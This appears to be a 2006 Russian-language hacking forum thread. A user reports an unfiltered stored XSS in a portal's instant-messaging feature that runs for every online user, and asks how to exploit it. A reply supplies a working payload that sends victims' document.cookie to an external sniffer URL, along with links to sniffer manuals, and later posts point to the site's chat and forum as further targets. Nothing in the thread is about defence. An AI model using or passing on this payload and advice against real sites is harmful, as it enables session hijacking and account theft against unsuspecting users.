Что можно сделать?

Discussion in 'Уязвимости' started by INDAHO, 14 Aug 2006.

Thread Status:
Not open for further replies.
  1. INDAHO

    INDAHO New Member

    Joined:
    15 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php ... так вот в неи есть активная xss , после добавления сообщения с хсс , алерт вызывается у всех пользователей что он-лаин. Сам скрипт был такои:
    Code:
    "><script>alert(document.cookie);</script>
    тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство :D Но просто хотелось бы знать многие варианты действий, которые можно совершить.
     
    #1 INDAHO, 14 Aug 2006
  2. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Я только сейчас понимаю как это тяжело каждый раз объяснять, что нужно делать в XSS.
    Вообщем, в поиске на а-чате или Googool забей "XSS снифер". Там посмотри - должен сам разобраться.
     
    #2 1ten0.0net1, 15 Aug 2006
  3. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    1) Юзай сниффер!
    Вот те мануал http://antichat.ru/sniff/
    Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg
    Лог сниффера: http://antichat.ru/sniff/log.php
    Можешь и персональный юзать например в http://s.netsec.ru
    Далее в алерт впихаешь сниффа + документ кукис ... чтоб заполучить кукисы жертвы
    Например:
    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    Как только скрипт выполнится , можешь посмотреть на логи сниффера и хитро улыбатся =)
     
    #3 Electro, 15 Aug 2006
    Last edited: 15 Aug 2006
    1 person likes this.
  4. INDAHO

    INDAHO New Member

    Joined:
    15 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Спасиб за инфу!) Но я хотел бы знать, кроме "утаскивания" куков, можно ли чтонить еще сделать?
     
    #4 INDAHO, 15 Aug 2006
    1 person likes this.
  5. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    DDos Имхо можно сделать!
    шутка :D
    Вот тебе еще один мануал открй для себя многое
    http://forum.antichat.ru/thread20140.html
     
    #5 Electro, 15 Aug 2006
    Last edited: 15 Aug 2006
  6. INDAHO

    INDAHO New Member

    Joined:
    15 Jan 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    этот мануал я читал ... =( Кукисы мне просто не нужны ... да и получить их там неполучается ...

    Разъясню что есть, есть портал на котором есть такая штука как мгновенные сообщения пользователям , что на саите , это сообщение открывается в небольшом маленьком php окошке ... но это окошко никаких куков не содержит ... я отправлял сообщение со скриптом на снифер ... но в логе снифера отображаются только ИПы и откуда они были направлены (тоесть с адреса того окна)
    Так что утащить куки не получается ... :confused:
     
    #6 INDAHO, 15 Aug 2006
  7. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    ХSS можешь исаользовать на чате и в форуме
    Кстати в мануале написано где и как можно использовать активную или пассивную XSS .. больше вариантов нет по использыванию XSS
     
    #7 Electro, 15 Aug 2006
    Last edited: 15 Aug 2006
  8. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Говорим спасибо Electro за ответ, а тему закрываем =) Ибо больше чем кража кук ты ничего не сделаешь.Закрыто.

    P.S. а сам уезжаю отдыхать =)
     
    #8 m0nzt3r, 15 Aug 2006
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.